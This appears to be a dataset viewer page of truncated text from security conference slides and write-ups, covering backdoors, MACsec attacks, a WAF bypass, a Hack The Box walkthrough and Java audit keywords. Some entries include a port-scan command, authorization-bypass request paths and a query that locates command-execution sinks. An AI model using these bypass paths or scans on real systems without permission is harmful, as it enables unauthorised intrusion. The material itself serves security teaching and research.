Backdooring & Breaking Signatures
William Martin (@QuickBreach)
> whoami
• William Martin
• OSCP
• Penetration Tester
• Supervisor at RSM US LLP in
Charlotte, NC
• Second time presenting at
DEFCON
• Twitter: @QuickBreach
> Who is this talk for?
• Red teamers looking to l... | pdf |
P R O T E C T I N G Y O U R N E T W O R K
Patrick DeSantis | @pat_r10t
FROM BOX TO BACKDOOR
U s i n g O l d S c h o o l To o l s a n d Te c h n i q u e s t o D i s c o v e r
B ac k doors in Modern Dev ic es
Patrick DeSantis | @pat_r10t
OVERVIEW
INTRO: WHO, WHAT, WHY
MOXA AWK3131A WAP
MOXA WAP: ABOU... | pdf |
Hacking the EULA: Reverse
Benchmarking Web Application
Security Scanners
Each year thousands of work hours are lost by security
practitioners sorting through web application security reports
separating out erroneous vulnerability data. Individuals must
currently work through this process in a vacuum, as there is ... | pdf |
Java 代码审计常用漏洞总结
1.1 审计方法总结
主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯:
跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑
可以是一个函数,或者是条小小的条件判断语句。
敏感函数参数回溯,根据敏感函数,逆向追踪参数传递的过程。这个方法是最高效,最常用
的方法。大多数漏洞的产生是因为函数的使用不当导致的,只要找到这些函数,就能够快速
挖掘想要的漏洞。
以下是基于关键词审计技巧总结:
在搜索时要注意是否为整个单词,以及小写敏感这些设置
漏洞名称
关键词
密码硬编码、密码明文存储
password 、pass、jdbc
XSS
getParamte... | pdf |
Bugscan
发展历程
01
圈子成员
02
框架改进
03
发展历程
2015.2
正式发布
2011
诞生
历时四年,五次重构
2015.5
圈子发布
2015.8
Bugscan
沙龙
圈子人数增加到5000多人,插件由90个增加到600多
目前可针对20多种系统服务进行识别,弱口令破解;
可识别,扫描80多种主流web程序,网络设备的漏洞。
目前已扫描超过100万的目标,600万余条漏洞记录
圈子成员
圈子(社区)
圈子成员
圈子(社区)核心成员
各种通用型插件,数量最多,质量最高
快速跟踪热点漏洞
发现Xx狗拒绝服务漏洞
各种系统服务,协议漏洞
插件审核,圈子商城
插件审核,插件编写教程
Zero
星光点亮◇天
rang... | pdf |
Windows 安全 - 服务篇(1)
0x00 前言
Windows安全范围真的很大,我也仅仅是在学习路上的行人。边学边记,在自己学习的同时,也希望有
一起的同行者。我计划从Windows服务开始,先学习windows服务的基础机制,然后再学习相关的安全
问题,然后记录这个过程中自己的一些思考,或延申性研究。这个过程中当然大量知识来自于网络公开
文献和《深入理解Windows操作系统7 》上下册。
Windows服务架构简图:
从简图看Windows服务的核心组件并不复杂,用户通常通过SCP类程序,例如:sc.exe等,来控制服务
应用。但是他并不是直接控制的,中间是通过SCM来控制的。
0x02 基础组件
通过上图,我们知道服务... | pdf |
Owning the LAN in 2018
Defeating MACsec and 802.1x-2010
DEF CON 26
Gabriel “solstice” Ryan
Disclaimers & Updates
These slides are an early version designed for pre-release prior to DEF CON 26.
All content will be updated by the time of the presentation at DEF CON 26 in
August. Final versions of all content will be av... | pdf |
对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md
2022/11/8
1 / 15
author: Y4er
前⾔
看到zdi发了⼀堆洞,有反序列化、⽬录穿越、权限绕过等等,还是dotnet的,于是有了此⽂。
基础架构
exe对应端⼝
C:\Program Files\InfraSuite Device Master\Device-DataCollect\Device-DataCollect.exe 3000
C:\Program Files\InfraSuite Device Master\Device-Gateway\Device-Gateway.exe 3100 3110
C:\Progra... | pdf |
8/5/16&
DEFCON24&A&Monitor&Darkly&&
8/5/16&
DEFCON24&A&Monitor&Darkly&&
https://
github.com/
RedBalloonShena
nigans/
MonitorDarkly
A Monitor Darkly
Ang Cui, PhD | Jatin Kataria
8/5/16&
DEFCON24&A&Monitor&Darkly&&
8/5/16&
DEFCON24&A&Monitor&Darkly&&
8/5/16&
DEFCON24&A&Monitor&Darkly&&
8/5/16&
DEFCON24&A&Monitor&Darkl... | pdf |
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.27
//-sC
//-sV
hack the box——-Archetype
0x00
0x01
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPac... | pdf |
1
OLONLWNW-记次绕waf
⼀、前⾔
⼆、第⼀次⻅这样的waf
三、⼲翻waf
做项⽬遇到,感觉有点意思记录⼀下。
打开这个站的时候就注意到了这个站⽤了之前我审过的⼀个框架具体是哪个就不说了。
本来想着直接打就⾏了结果有点意思。
java的框架存在两处权限绕过
第⼀处
第⼆处
我本着直接打完交洞的想法使⽤第⼆种权限绕过⽅式没想到看到了如下界⾯
⼀、前⾔
⼆、第⼀次⻅这样的waf
Plain Text
复制代码
Plain Text
复制代码
/xxx/../api/user
1
/api/user;1.js
1
2
我⼲了啥就拦我了,第⼀次⻅拦我分号。之前阿⾥云waf也不这么拦我啊
/api/user;?upload=fil... | pdf |
Covert
Post-Exploitation
Forensics with
Metasploit
Wesley McGrew
McGrewSecurity.com
Mississippi State University
National Forensics Training Center
From the DEF CON 19 CFP:
Okay, let’s get sneaky...
Covert
• without the subject’s knowledge
Post-Exploitation
• after a remote compromise, local backdoor
Forensics
• r... | pdf |
Kim Jong
Kim Jong--il and me:
il and me:
How to build a cyber army to attack the
How to build a cyber army to attack the
U.S.
U.S.
Charlie Miller
Charlie Miller
Independent Security Evaluators
Independent Security Evaluators
cmiller@securityevaluators.com
cmiller@securityevaluators.com
Overview
Overview
About me
Abo... | pdf |
Author:@Y4er.com
调用关系查询
分析
com.imc.iview.network.NetworkServlet#doPost
两次校验
com.imc.iview.utils.CUtils#checkFileNameIncludePath(java.lang.String)
MATCH (n:Class{NAME:'javax.servlet.http.HttpServlet'})-[:EXTEND]-(c:Class)-
[:HAS]->(m:Method)-[:CALL*2]-
(m1:Method{NAME:'exec',CLASS_NAME:'java.lang.Runtime'}) return *
检验 ... | pdf |
Abusing
HTML5
DEF
CON
19
Ming
Chow
Lecturer,
Department
of
Computer
Science
TuCs
University
Medford,
MA
02155
mchow@cs.tuCs.edu
What
is
HTML5?
• The
next
major
revision
of
HTML.
To
replace
XHTML?
Yes
• Close
enough
to
a
full-‐fledg... | pdf |
剑走偏锋
—蓝军实战缓解措施滥用
# Whoami
• @askme765cs
• 安全研究员@绿盟科技
• M01N战队核心成员
• 专注系统安全与终端对抗
目录
CONTENTS
01
02
03
Mitigations 101
Red Team Operation
"Mitigation Hell"
Part 01
Mitigations 101
01
Why Mitigations?
漏洞利用两种常见路径
• 数据破坏
• 代码执行
利用过程中的动作与特征
• 修改代码段
• 加载DLL
• 创建新进程
• …
Mitigations的效用
• 截断利用链,削减机会窗口
• 对抗未知威胁与潜在攻击
02
Mitigation... | pdf |
Hack Like the Movie Stars:
A Big-Screen Multi-Touch Network
Monitor
George Louthan & Cody Pollet & John Hale
Computer Science / www.isec.utulsa.edu
Overview
• Multi-touch interfaces
–
What is multi-touch?
•
This rhetorical question will not be dignified with a
response.
–
Optical multi-touch methods
• Our big boa... | pdf |
<location, date>
<Location, date>
Defcon Safe Mode // Aug 2020
Detecting Fake 4G Base Stations
in Real Time
Cooper Quintin - Senior Security Researcher - EFF Threat Lab
Defcon Safe Mode With Networking 2020
<location, date>
<Location, date>
Defcon Safe Mode // Aug 2020
Intro
•
Cooper Quintin
–
Senior security researc... | pdf |
1
Attacking Autonomic Networks
2
Agenda
o
o
o
o
3
Autonomic Systems
o
o
4
Autonomic Network
o
o
o
o
credits
5
Live Demo
6
Demo Results
o
o
o
7
Cisco Deployment
o
o
o
o
8
Channel Discovery
o
o
9
Adjacency Discovery
o
o
o
o
o
10
Adjacency Discovery
I support network/domain X
I am part of domain <domain name>
Registrar
En... | pdf |
Summary of Attacks Against
BIOS and Secure Boot
Yuriy Bulygin, John Loucaides, Andrew Furtak,
Oleksandr Bazhaniuk, Alexander Matrosov
Intel Security
In The Beginning
Was The Legacy BIOS..
Legacy BIOS
1.
CPU Reset vector in BIOS ’ROM’ (Boot Block)
2.
Basic CPU, chipset initialization
3.
Initialize Cache-as-... | pdf |
Advanced
API Security
OAuth 2.0 and Beyond
—
Second Edition
—
Prabath Siriwardena
Advanced API Security
OAuth 2.0 and Beyond
Second Edition
Prabath Siriwardena
Advanced API Security: OAuth 2.0 and Beyond
ISBN-13 (pbk): 978-1-4842-2049-8
ISBN-13 (electronic): 978-1-4842-2050-4
https://doi.org/10.1007/978-1-4842-205... | pdf |
你的智能硬件出卖了你的信息
—浅谈办公及教育场景硬件供应链安全
0 1
议程
• IoT产品供应链的安全现状
• 常见的保护机制及实现缺陷
• 如何避免缺陷,保护供应链安全
0 4
IoT产品供应链安全现状
金立2千多部手机被植入木马
软件供应链攻击易受关注,而
硬件供应链在流通环节的攻击,
非常容易被忽视。
0 5
IoT产品供应链安全现状
国内外的相关规范
0 7
IoT产品供应链安全现状
业界的做法
主流的桌面处理器、服务器、
笔电、操作系统厂商,很早就
实现了安全启动,可信计算等
机制。
0 8
IoT产品供应链安全现状
移动处理器厂商
高通、MTK等IoT
常用方案厂商都提
供了完整的
SecureBoot、TEE
的实现... | pdf |
Jim
Knowledge factors
Ownership factors
Inherence factors
Password
Pass phrase
Personal identification
number (PIN)
Challenge response (the user
must answer a question)
ID card
Security token
Software token
Phone
Cell phone
Fingerprint
Retinal pattern
DNA
Signature
Face
Voice
Unique bio-electric s... | pdf |
Anonymity Loves Company:
Usability and the Network Effect
Roger Dingledine and Nick Mathewson
The Free Haven Project
{arma,nickm}@freehaven.net
Abstract. A growing field of literature is studying how usability im-
pacts security [4]. One class of security software is anonymizing networks—
overlay networks on the Internet... | pdf |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.